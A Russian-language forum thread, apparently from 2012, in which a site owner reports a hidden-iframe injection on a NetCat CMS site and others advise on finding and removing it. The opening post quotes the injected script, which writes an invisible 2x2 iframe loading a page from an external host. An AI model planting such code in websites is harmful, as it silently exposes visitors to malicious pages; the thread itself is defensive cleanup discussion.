Регистрация
Регистрируясь, вы подтверждаете свое согласие с соглашением об использовании персональных данных.
Восстановление пароля
Страницы: 1  |  2
02.07.2012, 10:38
Гость
Гость

обнаружил на сайте вражеский вирусный код
Код:
<script type="text/javascript">
document.write('<iframe src="http://bedronca.co.cc/dfasdd.php?sfsdf=244180cdbd7dde2d" name="Google+" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><script type="text/javascript">
document.write('<iframe src="http://bedronca.co.cc/dfasdd.php?sfsdf=244180cdbd7dde2d" name="Google+" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
<title></title>
<meta name='description' content='' />
<meta name='keywords' content='' />
<meta http-equiv='Content-type' content='text/html; charset=windows-1251' />
<link href='/css/style.css' rel='stylesheet' type='text/css' />
<script src='/js/tabs.js' type='text/javascript'></script>
</head>

Код:
</body>
</html>
<script type="text/javascript">
document.write('<iframe src="http://bedronca.co.cc/dfasdd.php?sfsdf=244180cdbd7dde2d" name="Google+" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>


сдалал бекап и с помощью поиска Notepad+ нашел и удалил все записи <iframe src="http://bedronca.co.cc , но при просмотре исходного кода в браузере никаких изменнений не произошло - вражеский <iframe остался

как его удалить? откуда он может грузиться?
02.07.2012, 13:28
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Сайт состоит из:
1. файлов движка - это пхп скрипты, которые у вас на фтп лежат.
2. базы данных - там хранится контент и все настройки движка.

Соотв-но надо делать поиск "вражеского" кода по этим двум пунктам.

Temet nosce...
02.07.2012, 21:58
Гость
Гость

искал в бд и файлах сайта по разным частям из вышенаписанного кода, но результатов ноль...

что еще можно предпринять?
03.07.2012, 10:26
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Еще бывает, что в файле .htaccess инклудят вредоносный файл, который находится на вашем хостинге, но в других папках, которые вы не смотрели. Других вариантов я на своей практике не встречал. Очень вероятно, что вы просто не заметили этот код.

Цитата:
что еще можно предпринять?

Можно попробывать залить "чистый" дистрибутив неткета на фтп с перезаписью всех файлов.

Ну либо обращайтесь к специалистам, проведут аудит, устранят проблему.

Temet nosce...
04.07.2012, 15:40
Гость
Гость

Цитата:
Можно попробывать залить "чистый" дистрибутив неткета на фтп с перезаписью всех файлов.


Файлы - это базы переписать? С вирусом?
04.07.2012, 15:50
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

отделите мух от котлет. файлы - это файлы на фтп, база данных - это база данных, я писал про файлы на фтп.

Temet nosce...
04.07.2012, 17:05
Евгений

Зарегистрирован:
2012-05-22
Сообщений: 31

Гость,
большинство FTP-клиентов имеют поиск по содержимому файлов, достаточно указать в нем папку и вышеуказанный код, он найдет его во всех файлах автоматически.
04.07.2012, 17:31
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Цитата:
Гость,
большинство FTP-клиентов имеют поиск по содержимому файлов, достаточно указать в нем папку и вышеуказанный код, он найдет его во всех файлах автоматически.

Большинство "умных" вирусов кодирует свой код в base64, соотв-но предлагаемый поиск результатов не даст.

Temet nosce...
17.07.2012, 14:05
Finar
Ph&Ph

Зарегистрирован:
2008-03-01
Сообщений: 70

1. сделать дамп базы, скачать весь сайт вместе с ним
2. искать во всех файлах маленькие фрагменты вредокода, декодеры base64, характерные фрагменты вирусов (из вашей личной коллекции, накопленной с опытом)
3. найти и вырезать вирус. Посмотреть дату изменения файла, если отличается от соседних файлов, найти все файлы с такой же датой и проверить.
4. найти "ворота", через которые злоумышленник зашел (подозрительные "лишние" файлы через пофайловое сравнение с дистрибутивом) либо статистику access.log, либо иногда через внешние сервисы вроде яндекс-метрики.
5. удалить "ворота", поменять все логины и пароли

Если 2) не получилось, поднимать полную копию сайта и дербанить исходники netcat до тех пор, пока не докопаетесь до места, где код включается.

Обращайтесь, одним словом улыбка

директор в ph-ph.ru
26.07.2012, 10:11
Гость
Гость

не нашли, где код спрятан? та же ерунда просто. а код найти не могу, хоть убей
28.08.2012, 14:16
Руслан Густокашин
Студия Вэлпис

Зарегистрирован:
2012-02-06
Сообщений: 962

Ко нам обращалась с такой проблемой одна фирма. Анализ сайта показал, что был модифицирован /netcat/modules/default/function.inc.php , причем дата файла была сохранена старая.
Вычислили файл с помощью find и выборки по access time.
198 196 2013-02-11 10:06:29 12418
Страницы: 1  |  2
Описание проекта